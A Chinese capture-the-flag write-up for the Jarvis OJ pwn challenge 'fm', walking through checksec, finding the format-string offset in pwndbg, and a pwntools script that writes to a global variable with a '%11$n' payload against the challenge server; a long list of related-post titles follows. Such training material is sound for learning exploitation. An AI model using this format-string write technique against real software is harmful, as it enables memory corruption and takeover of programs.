[Jarvis OJ - PWN]——[61dctf]fm
[Jarvis OJ - PWN]——[61dctf]fm
- 题目地址: https://www.jarvisoj.com/challenges
- 题目:
还是先checksec一下, 开启了canary 和NX保护
在IDA中,查看一下, 这是一道格式化字符串的题。
找到x的地址
在pwndbg中进行调试一下, 寻找偏移
from pwn import *#p = remote("pwn2.jarvisoj.com",9895)
p = process("./fm")
gdb.attach(p, "b *0x080485AD")
x_addr = 0x0804A02C
payload = 'aaaa' + '%p'
p.sendline(payload)
p.interactive()
找到偏移为 0xb = 11
验证一下
from pwn import *#p = remote("pwn2.jarvisoj.com",9895)
p = process("./fm")
gdb.attach(p, "b *0x080485AD")
x_addr = 0x0804A02C
payload = 'aaaa' + '%11$p'
p.sendline(payload)
p.interactive()
0x61616161其实就是aaaa
因为我们要将x修改为4
所以
exploit
from pwn import *p = remote("pwn2.jarvisoj.com",9895)
#p = process("./fm")
#gdb.attach(p, "b *0x080485AD")
x_addr = 0x0804A02C
payload = p32(x_addr) + '%11$n'p.sendline(payload)
p.interactive()
一道简单的格式化字符串题,希望对你有所帮助
[Jarvis OJ - PWN]——[61dctf]fm相关推荐
- [Jarvis OJ - PWN]——Typo(内涵peak小知识)
[Jarvis OJ - PWN]--Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构.还是第一次遇到. pe ...
- [Jarvis OJ - PWN]——Backdoor
[Jarvis OJ - PWN]--Backdoor 题目地址: https://www.jarvisoj.com/challenges 题目: 额,怎么说呢这个题有点出乎我的意料, 有点晕乎乎的. ...
- [Jarvis OJ - PWN]——Test Your Memory
[Jarvis OJ - PWN]--Test Your Memory 题目地址: https://www.jarvisoj.com/challenges 题目: 32位程序,开了NX保护 IDA e ...
- [Jarvis OJ - PWN]——[XMAN]level4
[Jarvis OJ - PWN]--[XMAN]level4 题目地址: https://www.jarvisoj.com/challenges 题目: checksec一下 IDA中 思路 0x1 ...
- [Jarvis OJ - PWN]——Smashes
[Jarvis OJ - PWN]--Smashes 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先checksec一下看看.64位,并且除了PIE ...
- [Jarvis OJ - PWN]——[XMAN]level3_x64
[Jarvis OJ - PWN]--[XMAN]level3_x64 题目地址:https://www.jarvisoj.com/challenges 题目: 老样子,还是先checksec一下,再 ...
- [Jarvis OJ - PWN]——[XMAN]level3
[Jarvis OJ - PWN]--[XMAN]level3 题目地址:https://www.jarvisoj.com/challenges 题目: 先checksec一下,32位程序开启了NX保 ...
- [Jarvis OJ - PWN]——[XMAN]level2(x64)
[Jarvis OJ - PWN]--[XMAN]level2(x64) 题目地址:https://www.jarvisoj.com/challenges 题目: checksec一下,是64位程序. ...
- [Jarvis OJ - PWN]——Tell Me Something
[Jarvis OJ - PWN]--Tell Me Something 题目地址:https://www.jarvisoj.com/challenges 题目: 还是先checksec一下,64位开 ...
最新文章
- 操作系统安全加固原理
- 基于MATLAB的SUI信道模型的理论分析与仿真
- 李彦宏:百度吹过的牛逼今天实现了!
- 作业 给计算机编号 winform
- Linux内核空间内存申请函数kmalloc、kzalloc、vmalloc的区别
- canvas中文显示乱码 html5_40个常见的HTML5 面试问题及答案
- Leetcode之插入区间
- 一个程序员眼中的项目经理
- 分享9个ps、pr免费教程网站
- wps目录怎么加一条_WPS中如何正确插入目录_WPS怎么做目录
- 安装TimeGen波形绘图软件
- Windows删除打开方式多余项
- 精读《算法 - 动态规划》
- 仿淘宝头像上传功能(一)——前端篇。
- 行列式的定义及简单计算
- linux下设置MySQL密码
- 基于时延法的麦克风阵列声源定位分析
- CAFFE windows 配置 测试
- 70后程序男的成长经历
- 存储过程实现银行转账的简易操作
热门文章
- js入门系列演示·数组
- kali安装tools
- 【数据结构与算法】之深入解析“消除游戏”的求解思路与算法示例
- 【数据结构与算法】之深入解析“不同的二叉搜索树II”的求解思路与算法示例
- iOS经典面试题之深入解析类Class的iskindOfClass与isMemberOfClass的底层原理
- 根据使用频率为 5 个字符设计的哈夫曼编码不可能是( )
- 学计算机,怎么入门?
- Jenkins 创建一个freestyle的Job
- 2014\Province_C_C++_B\2 切面条
- 【机器视觉】 dev_open_window算子